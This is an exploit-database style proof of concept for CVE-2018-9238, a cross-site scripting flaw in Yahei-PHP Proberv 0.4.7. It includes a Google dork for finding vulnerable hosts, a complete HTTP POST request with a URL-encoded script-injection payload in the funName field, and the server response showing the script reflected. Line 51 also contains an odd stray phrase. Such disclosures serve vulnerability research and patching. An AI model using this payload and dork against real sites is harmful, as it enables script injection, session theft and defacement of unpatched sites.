CVE-2018-9238

1. # Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
2. # Google Dork: intitle:"Proberv0." | inurl:/proberv.php
3. # Date: 23/03/2018
4. # Exploit Author: ManhNho
5. # Vendor Homepage: http://www.yahei.net/
6. # Software Link: www.yahei.net/tz/tz_e.zip
7. # Version: 0.4.7
8. # CVE: CVE-2018-9238
9. # Category: Webapps
10.  
11. -----------------------------------------------------
12. PoC
13. -----------------------------------------------------
14. Request:
15.  
16. POST /proberv.php HTTP/1.1
17. Host: <target>
18. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
20. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
21. Accept-Encoding: gzip, deflate
22. Referer: <target>/proberv.php
23. Content-Type: application/x-www-form-urlencoded
24. Content-Length: 186
25. Connection: close
26. Upgrade-Insecure-Requests: 1
27.  
28. pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=
29.  
30. -----------------------------------------------------
31. Response:
32.  
33. HTTP/1.1 200 OK
34. Server: nginx
35. Date: Thu, 22 Mar 2018 16:59:57 GMT
36. Content-Type: text/html; charset=utf-8
37. Connection: close
38. Vary: Accept-Encoding
39. Content-Length: 30461
40. ...
41. <tr>
42. <td width="15%"></td>
43. <td width="60%">
44. Enter the function you want to test:
45. <input type="text" name="funName" size="50" />
46. </td>
47. <td width="25%">
48. <input class="btn" type="submit" name="act" align="right" value="Function Test" />
49. </td>
50. </tr>
51. <script>alert('Function')</script><script>alert("1");</script>Test results support the position: 错误')</script></table>
52. -----------------------------------------------------